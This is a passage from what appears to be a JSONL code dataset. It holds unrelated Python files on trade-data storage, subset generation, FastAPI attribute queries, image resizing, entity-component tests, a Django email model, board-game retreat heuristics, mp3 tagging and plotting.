timestamp=daily_ts_from,\n frequency=Frequency.DAY,\n )\n daily_cache.json_data = (\n target_cache.order_by(\"-timestamp\").first().json_data\n )\n daily_cache.save()\n target_cache.delete()\n logging.info(\n _(\"Converted {date} to daily\").format(\n **{\"date\": daily_ts_from.date()}\n )\n )\n\n\ndef convert_trade_data_to_hourly(\n symbol: Symbol, timestamp_from: datetime.datetime, timestamp_to: datetime.datetime\n):\n \"\"\"Convert trade data, by minute, to hourly.\"\"\"\n trade_data = TradeData.objects.filter(\n symbol=symbol,\n frequency=Frequency.MINUTE,\n )\n t = trade_data.filter(timestamp__gte=timestamp_from, timestamp__lte=timestamp_to)\n if t.exists():\n first = t.first()\n last = t.last()\n min_timestamp_from = first.timestamp\n if timestamp_from < min_timestamp_from:\n timestamp_from = min_timestamp_from\n max_timestamp_to = last.timestamp + pd.Timedelta(f\"{last.frequency}t\")\n if timestamp_to > max_timestamp_to:\n timestamp_to = max_timestamp_to\n for daily_ts_from, daily_ts_to in iter_timeframe(\n timestamp_from, timestamp_to, value=\"1d\", reverse=True\n ):\n for hourly_ts_from, hourly_ts_to in iter_timeframe(\n daily_ts_from, daily_ts_to, value=\"1h\", reverse=True\n ):\n delta = hourly_ts_to - hourly_ts_from\n total_minutes = delta.total_seconds() / Frequency.HOUR\n if total_minutes == Frequency.HOUR:\n minutes = trade_data.filter(\n timestamp__gte=hourly_ts_from, timestamp__lt=hourly_ts_to\n )\n if minutes.count() == Frequency.HOUR:\n data_frames = {\n t: t.get_data_frame() for t in minutes if t.file_data.name\n }\n for t, data_frame in data_frames.items():\n data_frame[\"uid\"] = \"\"\n # Set first index.\n uid = data_frame.columns.get_loc(\"uid\")\n data_frame.iloc[:1, uid] = t.uid\n if len(data_frames):\n filtered = pd.concat(data_frames.values())\n else:\n filtered = pd.DataFrame([])\n candles = candles_api(symbol, hourly_ts_from, hourly_ts_to)\n validated = validate_data_frame(\n hourly_ts_from,\n hourly_ts_to,\n filtered,\n candles,\n symbol.should_aggregate_trades,\n )\n # First, delete minutes, as naming convention is same as hourly.\n minutes.delete()\n # Next, create hourly\n TradeData.write(\n symbol,\n hourly_ts_from,\n hourly_ts_to,\n filtered,\n validated,\n )\n logging.info(\n _(\n \"Converted {timestamp_from} {timestamp_to} to hourly\"\n ).format(\n **{\n \"timestamp_from\": hourly_ts_from,\n \"timestamp_to\": hourly_ts_to,\n }\n )\n )\n\n\ndef clean_trade_data_with_non_existing_files(\n symbol: Symbol, timestamp_from: datetime.datetime, timestamp_to: datetime.datetime\n) -> None:\n \"\"\"Clean aggregated with non-existing files.\"\"\"\n logging.info(_(\"Checking objects with non existent files\"))\n\n trade_data = (\n TradeData.objects.filter(symbol=symbol)\n .exclude(file_data=\"\")\n .filter(\n timestamp__gte=timestamp_from,\n timestamp__lte=timestamp_to,\n )\n .only(\"frequency\", \"file_data\")\n )\n count = 0\n deleted = 0\n total = trade_data.count()\n for obj in trade_data:\n count += 1\n if not obj.file_data.storage.exists(obj.file_data.name):\n obj.delete()\n deleted += 1\n logging.info(\n _(\"Checked {count}/{total} objects\").format(\n **{\"count\": count, \"total\": total}\n )\n )\n\n logging.info(_(\"Deleted {deleted} objects\").format(**{\"deleted\": deleted}))\n\n\ndef clean_unlinked_trade_data_files(\n symbol: Symbol, timestamp_from: datetime.datetime, timestamp_to: datetime.datetime\n) -> None:\n \"\"\"Clean unlinked trade data files.\"\"\"\n logging.info(_(\"Checking unlinked trade data files\"))\n\n deleted = 0\n trade_data = (\n TradeData.objects.filter(symbol=symbol).exclude(file_data=\"\").only(\"file_data\")\n )\n t = trade_data.filter(\n timestamp__gte=timestamp_from,\n timestamp__lte=timestamp_to,\n )\n if t.exists():\n min_timestamp_from = t.first().timestamp\n if timestamp_from < min_timestamp_from:\n timestamp_from = min_timestamp_from\n max_timestamp_to = t.last().timestamp\n if timestamp_to > max_timestamp_to:\n timestamp_to = max_timestamp_to\n for daily_timestamp_from, daily_timestamp_to in iter_timeframe(\n timestamp_from, timestamp_to, value=\"1d\"\n ):\n expected_files = [\n os.path.basename(obj.file_data.name)\n for obj in trade_data.filter(\n timestamp__gte=daily_timestamp_from,\n timestamp__lte=daily_timestamp_to,\n )\n ]\n\n dummy = TradeData(symbol=symbol, timestamp=daily_timestamp_from)\n storage = dummy.file_data.storage\n directory, __ = os.path.split(upload_trade_data_to(dummy, \"dummy.parquet\"))\n __, filenames = storage.listdir(directory)\n\n should_delete = [\n filename for filename in filenames if filename not in expected_files\n ]\n for filename in should_delete:\n storage.delete(os.path.join(directory, filename))\n deleted += 1\n\n logging.info(\n _(\"Checked {date}\").format(**{\"date\": daily_timestamp_from.date()})\n )\n\n logging.info(\n _(\"Deleted {deleted} unlinked files\").format(**{\"deleted\": deleted})\n )\n","sub_path":"quant_candles/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":9729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"308013460","text":"my_set = {4, 2, 6}\n#subset = [{}, {4}, {2}, {6}, {4, 2}, {4, 6}, {2, 6}]\n\n\n#{}\n\n#{}, {4}\n#{}, {4}, {2}, {4, 2}\n#{}, {4}, {2}, {4, 2}, {6}, {4, 6}, {2, 6}, {4,2,6}\n\n\n#get_all_sebset{current_set, current_element}:\n # create copy of current_set\n # for all set in set list create a new set list by appedning the current_element\n # return current_set + next_set\n\n#get_all_subset(current_set):\n # result set = {}\n # for all element in set\n # add temp_get_all_subset(element, result_set) in to result_set\n\n\ndef get_all_subset_for_element(set_list, element):\n temp_set_list = []\n for item in set_list:\n item2 = item.copy()\n item2.add(element)\n temp_set_list.append(item2)\n result = set_list + temp_set_list\n return result\n\n\ndef get_all_subset(my_set):\n result_set = [set({})]\n for elelment in my_set:\n result_set = get_all_subset_for_element(result_set, elelment)\n return result_set\n\nprint(get_all_subset(my_set))\n","sub_path":"Python_Projects/6-Google codejam/get_all_subset.py","file_name":"get_all_subset.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"537308582","text":"from typing import List\nfrom fastapi.exceptions import HTTPException\nimport pydantic\nfrom sqlalchemy import select, and_\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom ..models import Attribute, BooleanAttribute, IntegerAttribute, FloatAttribute, StringAttribute\nfrom ..interfaces import *\nfrom sqlalchemy.orm import with_polymorphic\nfrom sqlalchemy.exc import IntegrityError\nfrom pydantic import parse_obj_as\n\nselect_attribute = with_polymorphic(Attribute, [BooleanAttribute, IntegerAttribute, FloatAttribute, StringAttribute])\n\n\nasync def query_attributes(session: AsyncSession, key: str, remote_reference: str):\n filters = {}\n if remote_reference:\n filters['remote_reference'] = remote_reference\n if key:\n filters['key'] = key\n result = await session.execute(select(select_attribute).filter_by(**filters))\n return result.scalars().all()\n\n\nasync def query_attribute_by_id(session: AsyncSession, id: int):\n \n result = await session.execute(select(select_attribute).where(Attribute.id == id))\n return result.scalars().one()\n\n\nasync def query_attribute_by_remote_and_id(session: AsyncSession, remote_reference: str, id: int) -> Attribute:\n result = await session.execute(\n select(select_attribute)\n .where(\n and_(\n Attribute.remote_reference == remote_reference,\n Attribute.id == id\n )\n )\n )\n return result.scalars().one()\n\n\nasync def query_attribute_by_remote_and_key(session: AsyncSession, remote_reference: str, key: str) -> Attribute:\n result = await session.execute(\n select(select_attribute)\n .where(\n and_(\n Attribute.remote_reference == remote_reference,\n Attribute.key == key\n )\n )\n )\n return result.scalars().one()\n\n\nasync def query_attributes_by_remote(session: AsyncSession, remote_reference: str) -> List[Attribute]:\n result = await session.execute(\n select(select_attribute)\n .where(\n and_(\n Attribute.remote_reference == remote_reference,\n )\n )\n )\n return result.scalars().all()\n\n\n\nasync def insert_attribute(session: AsyncSession, attribute: AttributeIn):\n\n v = attribute.value\n\n # The order of this is sensitive\n if isinstance(v, bool):\n new = BooleanAttribute(type=bool.__name__, remote_reference=attribute.remote_reference, key=attribute.key, value=attribute.value)\n elif isinstance(attribute.value, int):\n new = IntegerAttribute(type=int.__name__, remote_reference=attribute.remote_reference, key=attribute.key, value=attribute.value)\n elif isinstance(attribute.value, float):\n new = FloatAttribute(type=float.__name__, remote_reference=attribute.remote_reference, key=attribute.key, value=attribute.value)\n elif isinstance(attribute.value, str):\n new = StringAttribute(type=str.__name__, remote_reference=attribute.remote_reference, key=attribute.key, value=attribute.value)\n else:\n raise HTTPException(501, detail={\n \"status\": \"NOT_IMPLMENTED\",\n \"message\": \"Value must be of a type int, float, bool or string\"\n })\n try:\n session.add(new)\n await session.commit()\n return parse_obj_as(AttributeOut, new)\n except IntegrityError:\n attribute_query = with_polymorphic(Attribute, [BooleanAttribute, IntegerAttribute, FloatAttribute, StringAttribute])\n found_attr = session.execute(select(attribute_query).where(\"attribute.key\" == attribute.key))\n raise HTTPException(303, detail={\n \"status\": \"ALREADY_EXISTS\",\n \"message\": \"Attribute already exisits follow Location\"\n })","sub_path":"app/services/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"75075467","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport click\nfrom PIL import Image\nfrom utils.misc import get_file_list\nimport re\n\n\ndef validate_dim(ctx, param, value):\n percents = False\n if value.endswith('%'):\n value = value[:-1]\n percents = True\n if not re.match(r'^\\d{1,6}(\\.\\d{1,6})?$', value):\n raise click.BadParameter('invalid value')\n value = float(value)\n if value == 0:\n raise click.BadParameter('invalid value')\n return value, percents\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.argument('w', callback=validate_dim)\n@click.argument('h', callback=validate_dim)\ndef resize(path, w, h):\n \"\"\"\n Resize all images in the given folder and all sub folders.\n Width and Height can be integer or float values in pixels or percents: 10, 12.5, 80%, 20.5%.\n Result size will be rounded to integer.\n \"\"\"\n for f in get_file_list(path):\n im = Image.open(f).convert('RGBA')\n new_w = int(round(im.size[0] * w[0] / 100. if w[1] else w[0]))\n new_h = int(round(im.size[1] * h[0] / 100. if h[1] else h[0]))\n new_im = im.resize((new_w, new_h), Image.LANCZOS)\n new_im.save(f)\n\n\nif __name__ == '__main__':\n resize()\n","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"190508210","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_rui\n----------------------------------\n\nTests for `rui` module.\n\"\"\"\n\nimport sys\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\nfrom rui.rui import Component, System, World\nfrom rui.exceptions import (DuplicateEntityError, DuplicateSystemError,\n UnmanagedEntityError, UnmanagedSystemError,\n NonUniqueTagError, DeadEntityError)\n\n\nclass Counter(Component):\n def __init__(self, count):\n self.count = count\n\n\nclass Empty(Component):\n def __init__(self):\n pass\n\n\nclass CountSystem(System):\n def process(self, delta):\n entities = self.world.get_entities_by_components(Counter)\n\n for entity in entities:\n entity.get_component(Counter).count += (1 * delta)\n\n\nclass TestRui(unittest.TestCase):\n\n def setUp(self):\n self.world = World()\n\n ## Testing Components\n def test_add_component(self):\n entity = self.world.create_entity()\n counter = Counter(0)\n replaceCounter = Counter(1)\n entity.add_component(counter)\n self.assertTrue(counter in entity.get_components())\n getCounter = entity.get_component(Counter)\n self.assertEqual(counter, getCounter)\n self.assertEqual(getCounter.count, 0)\n entity.add_component(replaceCounter)\n self.assertTrue(counter in entity.get_components())\n getCounter = entity.get_component(Counter)\n self.assertEqual(replaceCounter, getCounter)\n self.assertEqual(getCounter.count, 1)\n\n def test_get_entites_by_components(self):\n entity = self.world.create_entity()\n entity.add_component(Counter(0))\n entity.add_component(Empty())\n empty_entity = self.world.create_entity()\n empty_entity.add_component(Empty())\n self.world.add_entity(entity)\n self.world.add_entity(empty_entity)\n\n partial_entities = self.world.get_entities_by_components(Counter)\n self.assertEqual(len(partial_entities), 1)\n\n full_entities = self.world.get_entities_by_components(Counter, Empty)\n self.assertEqual(len(full_entities), 1)\n self.assertEqual(full_entities, partial_entities)\n\n empty_entities = self.world.get_entities_by_components(Empty)\n self.assertEqual(len(empty_entities), 2)\n self.assertTrue(empty_entity in empty_entities)\n\n ## Testing Entities\n def test_add_entity(self):\n entity = self.world.create_entity()\n self.world.add_entity(entity)\n self.assertTrue(entity in self.world.get_entities())\n\n def test_entity_tag(self):\n noTagEntity = self.world.create_entity()\n tagEntity = self.world.create_entity('TAG')\n self.world.add_entities(noTagEntity, tagEntity)\n self.assertNotEqual(noTagEntity, self.world.get_entity_by_tag('TAG'))\n self.assertEqual(tagEntity, self.world.get_entity_by_tag('TAG'))\n\n def test_groups(self):\n inGroupEntity = self.world.create_entity()\n inGroupEntity2 = self.world.create_entity()\n notInGroupEntity = self.world.create_entity()\n self.world.add_entity(inGroupEntity)\n self.world.add_entity(inGroupEntity2)\n self.world.add_entity(notInGroupEntity)\n self.world.register_entity_to_group(inGroupEntity, 'GROUP')\n self.world.register_entity_to_group(inGroupEntity2, 'GROUP')\n group = self.world.get_group('GROUP')\n self.assertTrue(inGroupEntity in group)\n self.assertTrue(inGroupEntity2 in group)\n self.assertFalse(notInGroupEntity in group)\n\n def test_kill_entity(self):\n entity = self.world.create_entity('KILL')\n self.world.add_entity(entity)\n self.world.register_entity_to_group(entity, 'DYING')\n self.assertEquals(len(self.world.get_group('DYING')), 1)\n self.assertTrue(entity in self.world.get_entities())\n entity.kill()\n self.assertFalse(entity in self.world.get_entities())\n self.assertEquals(len(self.world.get_group('DYING')), 0)\n\n entity = self.world.create_entity('KILL')\n self.world.add_entity(entity)\n self.world.register_entity_to_group(entity, 'DYING')\n self.assertEquals(len(self.world.get_group('DYING')), 1)\n self.assertTrue(entity in self.world.get_entities())\n self.world.remove_entity(entity)\n self.assertFalse(entity in self.world.get_entities())\n self.assertEquals(len(self.world.get_group('DYING')), 0)\n with self.assertRaises(DeadEntityError):\n entity.kill()\n\n ## Testing Systems\n def test_add_system(self):\n entity = self.world.create_entity()\n entity.add_component(Counter(0))\n self.world.add_entity(entity)\n count_system = CountSystem()\n self.world.add_system(count_system)\n count_system.process(1)\n self.assertEqual(entity.get_component(Counter).count, 1)\n self.world.process()\n self.assertEqual(entity.get_component(Counter).count, 2)\n\n def test_remove_system(self):\n entity = self.world.create_entity()\n entity.add_component(Counter(0))\n self.world.add_entity(entity)\n count_system = CountSystem()\n self.world.add_system(count_system)\n self.world.process()\n self.assertEqual(entity.get_component(Counter).count, 1)\n self.world.remove_system(count_system)\n self.world.process()\n self.assertEqual(entity.get_component(Counter).count, 1)\n\n ## Test Exceptions\n def test_duplicate_entity_error(self):\n entity = self.world.create_entity()\n self.world.add_entity(entity)\n with self.assertRaises(DuplicateEntityError):\n self.world.add_entity(entity)\n\n def test_duplicate_system_error(self):\n count_system = CountSystem()\n duplicateCountSystem = CountSystem()\n self.world.add_system(count_system)\n with self.assertRaises(DuplicateSystemError):\n self.world.add_system(count_system)\n self.world.add_system(duplicateCountSystem)\n\n def test_unmanaged_entity_error(self):\n entity = self.world.create_entity()\n with self.assertRaises(UnmanagedEntityError):\n self.world.register_entity_to_group(entity, 'GROUP')\n self.world.add_entity(entity)\n self.world.register_entity_to_group(entity, 'GROUP')\n\n def test_unmanaged_system_error(self):\n count_system = CountSystem()\n with self.assertRaises(UnmanagedSystemError):\n self.world.remove_system(count_system)\n self.world.add_system(count_system)\n self.world.remove_system(count_system)\n\n def test_non_unique_tag_error(self):\n entity = self.world.create_entity('TAG')\n self.world.add_entity(entity)\n nonUniqueEntity = self.world.create_entity('TAG')\n otherEntity = self.world.create_entity('FAKE')\n self.world.add_entity(otherEntity)\n\n with self.assertRaises(NonUniqueTagError):\n self.world.add_entity(nonUniqueEntity)\n self.world.get_entity_by_tag('FAKE').set_tag('TAG')\n\n def tearDown(self):\n pass\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_rui.py","file_name":"test_rui.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"635468095","text":"from django.http import HttpResponse\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.contrib import admin\n\n\nclass Email(models.Model):\n email = models.EmailField(max_length=200)\n\n def __unicode__(self):\n return u'<\"%s\">' % self.email\n\nadmin.site.register(Email)\n\ndef proc_email(email_addy, log):\n log.info('Processing: %r', email_addy)\n\n try:\n em = Emails.objects.get(email=email_addy)\n\n except Emails.DoesNotExist:\n log.info('New email: %r', email_addy)\n em = Emails(email=email_addy)\n try:\n em.clean_fields()\n except ValidationError:\n log.warning('Invalid address: %r', em)\n else:\n em.save()\n log.info('Created: %s', em)\n\n else:\n log.info('Duplicate email: %s', em)\n\n return HttpResponse(\n \"%r, please.\" % (email_addy,),\n mimetype=\"text/plain\"\n )\n","sub_path":"juvume/splash/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"624519345","text":"import simulations\nimport blocks\nimport weighted_prob\nimport region_danger\nimport play_game\ndef find_location(board, blok):\n\t'''\n\tThis function takes a board object and the name of a block\n\tand returns a region object where the block is\n\t'''\n\n\t\n\tfor region in board.regions:\n\t\tfor bllock in region.blocks_present:\n\t\t\t\n\t\t\tif bllock.name == blok.name:\n\t\t\t\treturn region\n\ndef retreat(board, regionID, locations, simulation_dict, is_attacking, turn, combat_dict={}):\n\t'''\n\tThis function is meant to calculate a weight to whether or not \n\tthe computer opponent should retreat at any point during\n\ta battle. regionID is a region ID, paths is a list of the possible\n\tpaths of retreating, simulation_dict contains the win percentages from\n\tthe simulations and average strength lost values. is_attacking is a boolean\n\tthat is True if the computer is attacking and False if the computer is\n\tdefending\n\t'''\n\n\tif len(combat_dict) == 0:\n\t\tplay_game.set_up_combat_dict(board,board.regions[regionID])\n\t\tcombat_dict = board.regions[regionID].combat_dict\n\n\n\n\tif(len(combat_dict['Attacking']) == 0 or len(combat_dict['Defending']) == 0):\n\n\t\treturn_dict = {'Staying value ': 10}\n\t\treturn return_dict\n\n\n\t#Valuable Blocks and respective weights\n\tvaluable_blocks = {'WALLACE':18, 'KING':22, 'EDWARD':16, 'HOBELARS':13}\n\n\tif (is_attacking and combat_dict['Attacking'][0].allegiance == 'ENGLAND') or (not is_attacking and combat_dict['Defending'][0].allegiance == 'ENGLAND'):\n\n\t\trole = 'ENGLAND'\n\n\telse:\n\n\t\trole = 'SCOTLAND'\n\n\tstaying_value = value_of_location(board, regionID, role) * 1.3\n\n\tretreating_value = 0\n\n\tfriendly_block_names = list()\n\n\tfriendly_blocks = list()\n\n\tenemy_block_names = list()\n\n\tenemy_blocks = list()\n\n\treturn_dict = {'Staying value ': staying_value}\n\n\t\n\n\t#Add weight based on the difference is strength lost in the battle\n\tif is_attacking:\n\n\t\tstrength_dif = simulation_dict['Attacker strength lost'] - simulation_dict['Defender strength lost']\n\n\telif not is_attacking:\n\n\t\tstrength_dif = simulation_dict['Defender strength lost'] - simulation_dict['Attacker strength lost']\n\n\tif role == 'SCOTLAND':\n\n\t\tretreating_value += strength_dif * 4\n\n\telse:\n\n\t\tretreating_value += strength_dif * 2\n\n\n\n\t#Add weight based on the results of the simulation\n\n\tif not is_attacking:\n\n\t\tretreating_value += simulation_dict['attacker wins'] * 10\n\n\telse:\n\n\t\tretreating_value += simulation_dict['defender wins'] * 10\n\n\t\tretreating_value += simulation_dict['attacker retreats'] * 2\n\n\t#Create a list of friendly blocks in the current battle\n\tif is_attacking:\n\n\t\tfor block in combat_dict['Attacking']:\n\n\t\t\tfriendly_block_names.append(block.name)\n\t\t\tfriendly_blocks.append(block)\n\n\t\tfor block in combat_dict['Defending']:\n\n\t\t\tenemy_block_names.append(block.name)\n\t\t\tenemy_blocks.append(block)\n\n\telse:\n\n\t\tfor block in combat_dict['Defending']:\n\n\t\t\tfriendly_block_names.append(block.name)\n\t\t\tfriendly_blocks.append(block)\n\n\t\tfor block in combat_dict['Attacking']:\n\n\t\t\tenemy_block_names.append(block.name)\n\t\t\tenemy_blocks.append(block)\n\n\t#Check to see if any of the friendly blocks are the valuable blocks\n\tif len(friendly_blocks) == 0 and friendly_blocks[0].current_strength == 1:\n\t\tretreating_value += 10\n\n\tfor block_name in valuable_blocks:\n\n\t\tif block_name in friendly_block_names:\n\n\t\t\tretreating_value += valuable_blocks[block_name]\n\n\t\telif block_name in enemy_block_names:\n\n\t\t\tretreating_value += -.5 * valuable_blocks[block_name]\n\n\t#Weight if you are going to lose a noble\n\tfor block in friendly_blocks:\n\n\t\tif type(block) == blocks.Noble:\n\n\t\t\tretreating_value += noble_going_to_be_lost(board, block, role, turn) * -8\n\n\t\t\tretreating_value += noble_not_going_to_be_occupied(board, block, turn, role) * 8 \n\n\t#Weight if the enemy is going to lose a noble\n\tfor block in enemy_blocks:\n\n\t\tif type(block) == blocks.Noble:\n\n\t\t\tretreating_value += noble_going_to_be_lost(board, block, role, turn) * 6\n\n\t\t\tretreating_value += noble_not_going_to_be_occupied(board, block, turn, role) * -6\n\tif 'WALLACE' in friendly_block_names and len(enemy_blocks) == 1:\n\n\t\tretreating_value = 1\n\n\tfor location in locations:\n\n\t\treturn_dict[location] = value_of_location(board, location, role) * retreating_value\n\n\tfor key in return_dict:\n\t\t\n\t\tif return_dict[key] <= 0:\n\t\t\treturn_dict[key] = 0.000000001\n\n\treturn return_dict\n\n\n\ndef noble_going_to_be_lost(board, noble_object, role, turn):\n\t\"\"\"\n\treturns float\n\t1.0 means better chances of being lost\n\t0.0 means lower chances of being lost\n\tvery arbitrary numbers\n\tnot very good indication\n\t\"\"\"\n\n\tclose_to_winter = .2 * turn\n\tlost_flt = 0.0\n\tif type(noble_object.home_location) == int:\n\t\thome_location_tuple = (noble_object.home_location,)\n\telse:\n\t\thome_location_tuple = noble_object.home_location\n\n\t#checking who occupies it\n\tfor home_location_id in home_location_tuple:\n\t\tif board.regions[home_location_id].is_enemy(role):\n\t\t\tlost_flt += 0.7\n\t\telif board.regions[home_location_id].is_friendly(role):\n\t\t\tlost_flt += 0.03\n\t\telse:\n\t\t\tlost_flt += 0.2\n\n\t\t#checking who is around the noble_home_location\n\t\tcurrent_location = find_location(board, noble_object)\n\t\tfor regionID, border in enumerate(board.dynamic_borders[current_location.regionID]):\n\t\t\tif border != 0:\n\t\t\t\tif board.regions[regionID].is_enemy(role):\n\t\t\t\t\tlost_flt += 0.3\n\t\t\t\telif board.regions[regionID].is_friendly(role):\n\t\t\t\t\tlost_flt += .01\n\t\t\t\telse:\n\t\t\t\t\tlost_flt += .07\n\n\treturn lost_flt * close_to_winter\ndef noble_going_to_be_kept(board, noble_object, turn, role):\n\t\"\"\"\n\treturns between 0.0 and 1.0\n\t1.0 more likely to be kept\n\t\"\"\"\n\treturn (1 - noble_going_to_be_lost(board, noble_object, turn, role))\n\ndef noble_not_going_to_be_occupied(board, noble_object, turn, role):\n\t\"\"\"\n\treturns between 0.0 and 1.0\n\t1.0 home locatino more likely to be not occupied\n\t\"\"\"\n\tlost_flt = 0.0\n\tclose_to_winter = .2 * turn\n\tif type(noble_object.home_location) == int:\n\t\thome_location_tuple = (noble_object.home_location, )\n\telse:\n\t\thome_location_tuple = noble_object.home_location\n\n\t#checking who occupies it\n\tfor home_location_id in home_location_tuple:\n\t\tif board.regions[home_location_id].is_enemy(role):\n\t\t\tlost_flt += 0.05\n\t\telif board.regions[home_location_id].is_friendly(role):\n\t\t\tlost_flt += 0.05\n\t\telse:\n\t\t\tlost_flt += 0.7\n\n\t\t#checking who is around the noble_home_location\n\t\tcurrent_location = find_location(board, noble_object)\n\t\tfor regionID, border in enumerate(board.dynamic_borders[current_location.regionID]):\n\t\t\tif border != 0:\n\t\t\t\tif board.regions[regionID].is_enemy(role):\n\t\t\t\t\tlost_flt += 0.13\n\t\t\t\telif board.regions[regionID].is_friendly(role):\n\t\t\t\t\tlost_flt += 0.13\n\t\t\t\telse:\n\t\t\t\t\tlost_flt += 0.3\n\treturn lost_flt * close_to_winter\n\ndef value_of_location(current_board, regionID, role):\n\t\"\"\"\n\treturns float between 0.0 and 1.0\n\tROSS 0 F T 1\nGARMORAN 1 F T 0\nMORAY 2 F T 2\nSTRATHSPEY 3 T T 1 \nBUCHAN 4 F T 2\nLOCHABER 5 F T 1 \nBADENOCH 6 F F 2\nMAR 7 F F 1\nANGUS 8 F T 2\nARGYLL 9 F T 2\nATHOLL 10 F F 1\nFIFE 11 T T 2\nLENNOX 12 T T 1 \nMENTIETH 13 F T 3\nCARRICK 14 F T 1\nLANARK 15 F F 2\nLOTHIAN 16 F T 2\nDUNBAR 17 F T 2\nSELKIRK-FOREST 18 F F 0\nGALLOWAY 19 F T 1\nANNAN 20 F T 2\nTEVIOT 21 F F 1\nENGLAND 22 F T 0\n\t\"\"\"\n\tenemy_strength_lst = region_danger.table(current_board, role)\n\tvalue_lst = [22, 5, 14, 10, 30, 11, 15, 18, 37, 17, 21, 42, 27, 50, 11, 26, 13, 17, 5, 19, 15, 12, 11]\n\n\tfor i, number in enumerate(enemy_strength_lst):\n\t\tif number != -1:\n\t\t\tvalue_lst[i] -= number\n\t\tvalue_lst[i] = value_lst[i] / 50\n\t\tif value_lst[i] < 0:\n\t\t\tvalue_lst[i] = 0\n\t#print('VALUE ' + str(value_lst[regionID]))\n\treturn value_lst[regionID]\n\n\n\n\n\n\n\n\n\t\n\n\n\n\n","sub_path":"retreat.py","file_name":"retreat.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"551261342","text":"# rename.py\n# This script uses mp3-tagger to fix the meta data on mp3 files that\n# cause mp3 players to wrongly categorize albums\n\n# REQUIREMENTS:\n# Install mp3-tagger at: https://pypi.org/project/mp3-tagger/\n\n# INSTRUCTIONS:\n# Put this file in the same directory as the songs\n# Make sure that songs are in an album directory that is in an artist directory\n# run the script\n\n\nimport os\nfrom mp3_tagger import MP3File, VERSION_1, VERSION_2, VERSION_BOTH\n\ndirname = os.getcwd()\nfiles = os.listdir(dirname)\n\ndir_list = dirname.split('\\\\')\nalbum_name = dir_list[-1]\nartist_name = dir_list[-2]\n\nsongs = []\nfor file in files:\n\tif file.endswith('.mp3'):\n\t\tsongs.append(file)\n\nprint(\"Working..\")\n\nfor song_path in songs:\n\taudio_file = MP3File(song_path)\n\taudio_file.set_version(VERSION_BOTH)\n\taudio_file.album = album_name\n\taudio_file.artist = artist_name\n\taudio_file.band = artist_name\n\taudio_file.save()\n\nprint(\"Done\")\n","sub_path":"album_sort/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550167184","text":"# conx - a neural network library\n#\n# Copyright (c) 2017 Douglas S. Blank \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor,\n# Boston, MA 02110-1301 USA\n\n\nimport base64\nimport io\nimport numpy as np\nimport copy\nfrom .utils import get_colormap\n\nfrom IPython.display import SVG\n\ntry:\n import matplotlib.pyplot as plt\nexcept:\n plt = None\n\ndef plot_f(f, frange=(-1, 1, .1), symbol=\"o-\"):\n \"\"\"\n Plot a function.\n \"\"\"\n xs = np.arange(*frange)\n ys = [f(x) for x in xs]\n plt.plot(xs, ys, symbol)\n plt.show()\n #bytes = io.BytesIO()\n #plt.savefig(bytes, format='svg')\n #svg = bytes.getvalue()\n #plt.close(fig)\n #return SVG(svg.decode())\n\ndef plot(lines, width=8.0, height=4.0, xlabel=\"time\", ylabel=\"\"):\n \"\"\"\n SVG(plot([[\"Error\", \"+\", [1, 2, 4, 6, 1, 2, 3]]],\n ylabel=\"error\",\n xlabel=\"hello\"))\n \"\"\"\n if plt is None:\n raise Exception(\"matplotlib was not loaded\")\n plt.rcParams['figure.figsize'] = (width, height)\n for (label, symbol, data) in lines:\n kwargs = {}\n args = [data]\n if label:\n kwargs[\"label\"] = label\n if symbol:\n args.append(symbol)\n plt.plot(*args, **kwargs)\n if any([line[0] for line in lines]):\n plt.legend()\n if xlabel:\n plt.xlabel(xlabel)\n if ylabel:\n plt.ylabel(ylabel)\n plt.show()\n #bytes = io.BytesIO()\n #plt.savefig(bytes, format='svg')\n #svg = bytes.getvalue()\n #plt.close(fig)\n #return SVG(svg.decode())\n\n\ndef plot_activations(net, from_layer, from_units, to_layer, to_unit,\n colormap, default_from_layer_value, resolution,\n act_range, show_values):\n # first do some error checking\n assert net[from_layer] is not None, \"unknown layer: %s\" % (from_layer,)\n assert type(from_units) in (tuple, list) and len(from_units) == 2, \\\n \"expected a pair of ints for the %s units but got %s\" % (from_layer, from_units)\n ix, iy = from_units\n assert 0 <= ix < net[from_layer].size, \"no such %s layer unit: %d\" % (from_layer, ix)\n assert 0 <= iy < net[from_layer].size, \"no such %s layer unit: %d\" % (from_layer, iy)\n assert net[to_layer] is not None, \"unknown layer: %s\" % (to_layer,)\n assert type(to_unit) is int, \"expected an 